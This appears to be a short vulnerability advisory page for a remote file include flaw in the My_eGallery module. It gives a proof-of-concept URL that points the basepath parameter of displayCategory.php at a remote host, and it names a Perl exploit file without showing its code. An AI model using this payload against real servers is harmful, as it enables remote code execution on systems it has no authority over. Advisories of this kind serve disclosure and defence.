My_EGallery Module Remote Include Command Injection Vulnerability

info
discussion
exploit
solution
references

My_EGallery Module Remote Include Command Injection Vulnerability

The following proof of concept has been provided:

http://www.example.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.example.com

The following exploit has been made available:

/data/vulnerabilities/exploits/My_eGalleryExploit.pl